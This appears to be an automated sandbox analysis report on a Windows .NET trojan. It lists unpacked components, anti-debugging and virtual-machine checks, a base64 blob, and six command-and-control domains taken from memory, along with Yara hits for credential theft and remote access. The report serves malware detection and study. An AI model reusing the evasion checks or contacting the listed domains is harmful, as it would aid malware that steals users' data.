Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00425070
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00422022
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0043D030
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_004370C2
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_004350C0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_004230D0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0041709A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0043D8A0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00403940
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0041895F
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0042A96A
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00405970
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00417971
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0042A972
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0042717D
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00409100
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00435930
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0043C130
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0040D1C7
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0042B9CD
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_004061D0
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0042698C
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0041F990
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004219A32_2_004219A3
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004249BC2_2_004249BC
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041BF2B2_2_0041BF2B
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004222502_2_00422250
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004342C32_2_004342C3
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004212C02_2_004212C0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004162D62_2_004162D6
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004142E02_2_004142E0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004042F02_2_004042F0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00417AFA2_2_00417AFA
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00434A932_2_00434A93
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043D2B02_2_0043D2B0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042BABA2_2_0042BABA
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004393402_2_00439340
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004113572_2_00411357
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042335E2_2_0042335E
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041BB702_2_0041BB70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042BB032_2_0042BB03
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00438B002_2_00438B00
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042BB122_2_0042BB12
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004353202_2_00435320
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004233862_2_00423386
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00402BA02_2_00402BA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004074402_2_00407440
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00416C7C2_2_00416C7C
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00404C202_2_00404C20
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00421CCF2_2_00421CCF
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00427CD42_2_00427CD4
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043C4902_2_0043C490
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00435CA02_2_00435CA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004095602_2_00409560
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00422D702_2_00422D70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043BD102_2_0043BD10
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041E5202_2_0041E520
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004155382_2_00415538
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00425DC12_2_00425DC1
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041CDF02_2_0041CDF0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004205902_2_00420590
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043D5902_2_0043D590
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041D5A02_2_0041D5A0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00417DA02_2_00417DA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004066602_2_00406660
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00408E702_2_00408E70
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043BE002_2_0043BE00
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004196202_2_00419620
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042262A2_2_0042262A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00405E302_2_00405E30
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042A63F2_2_0042A63F
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042CECB2_2_0042CECB
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00420EE02_2_00420EE0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00411E902_2_00411E90
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042A69A2_2_0042A69A
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0040AEB02_2_0040AEB0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00402F402_2_00402F40
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_00438F602_2_00438F60
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041077E2_2_0041077E
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004147132_2_00414713
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0041BF2B2_2_0041BF2B
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042673E2_2_0042673E
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004087802_2_00408780
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043B7812_2_0043B781
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_004337982_2_00433798
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043BFA02_2_0043BFA0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: String function: 004142D0 appears 70 times
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: String function: 00407F20 appears 53 times
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1429651490.0000000005F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLcgkqdml.dll" vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1403828044.00000000016CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000000.1385787272.00000000010DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameldr.exe( vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLcgkqdml.dll" vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exeBinary or memory string: OriginalFilenameldr.exe( vs 3vLKNycnrz.exe
                    Source: 3vLKNycnrz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 3vLKNycnrz.exe, avl.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3vLKNycnrz.exe, atr.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 3vLKNycnrz.exe, auk.csBase64 encoded string: 'xGXeA0tmuU7IEUJu9GjEGEAl1m/eEkNp+2WWMEt/0nLZBVdK5G/IGkxn7ifKElpU0WnBG2Bq+nmWGF5U3nLIBltq+3XZDhVs8mjyO0tl8GjFTGlu40jUB0tN5XPAP09l83DITElu40PjFkNurFXDE0tz2HqWJUtq80/ZBUdl8CfsE0ow8HnZKH5k5HXZHkFlrHvIA3FI4m7fEkB/03PAFkdlrE/IA2pq432WRRk8oiSWNl148nHPG1dY8m7bElwwxHXAB0Ju1m/eEkNp+2XoD15n+G7IBRVp9n7IG1hmrG/AGEVu43neAw=='
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@1/1
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0042CAFB CoCreateInstance,2_2_0042CAFB
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMutant created: \Sessions\1\BaseNamedObjects\Gaxvawd
                    Source: 3vLKNycnrz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 3vLKNycnrz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 3vLKNycnrz.exeReversingLabs: Detection: 52%
                    Source: 3vLKNycnrz.exeVirustotal: Detection: 56%
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeFile read: C:\Users\user\Desktop\3vLKNycnrz.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 3vLKNycnrz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 3vLKNycnrz.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: 3vLKNycnrz.exeStatic file information: File size 3635712 > 1048576
                    Source: 3vLKNycnrz.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x377000
                    Source: 3vLKNycnrz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431795732.0000000006370000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.3vLKNycnrz.exe.4fb8558.6.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, ListDecorator.cs | .Net Code: Read
Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
Source: 0.2.3vLKNycnrz.exe.62d0000.9.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
Source: Yara match | File source: 0.2.3vLKNycnrz.exe.6240000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.3vLKNycnrz.exe.47d16e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.3vLKNycnrz.exe.45cf2a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1430982949.0000000006240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 3vLKNycnrz.exe PID: 7360, type: MEMORYSTR
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_0329C478 pushad ; retf
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_06C76DAE push ss; ret
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0044183C push cs; retf
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00442A54 push eax; retn 0041h
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0043BCA0 push eax; mov dword ptr [esp], 1D1C1BCAh
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00441E88 push esi; ret
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_00438EB0 push eax; mov dword ptr [esp], 6A6B6C6Dh
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: 3vLKNycnrz.exe PID: 7360, type: MEMORYSTR
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Memory allocated: 31F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Memory allocated: 3460000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Memory allocated: 31F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3vLKNycnrz.exe TID: 7484 | Thread sleep time: -30000s >= -30000s
Source: 3vLKNycnrz.exe, 00000002.00000002.1443006164.00000000013FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@mD
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: model0Microsoft|VMWare|Virtual
Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW}
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 0_2_03291320 CheckRemoteDebuggerPresent
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Code function: 2_2_0043A5B0 LdrInitializeThunk
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\3vLKNycnrz.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: debonairnukk.xyz
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: diffuculttan.xyz
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: effecterectz.xyz
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: deafeninggeh.biz
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: immureprech.biz
Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: peelyitemsn.click
Source: C:\Users\user\Desktop\3vLKNycnrz.exe; Process created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"
Source: C:\Users\user\Desktop\3vLKNycnrz.exe; Queries volume information: C:\Users\user\Desktop\3vLKNycnrz.exe VolumeInformation
Source: C:\Users\user\Desktop\3vLKNycnrz.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\3vLKNycnrz.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\3vLKNycnrz.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; techniques listed in matrix order, with the numeric badges shown in the original kept in front of the technique they belong to)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
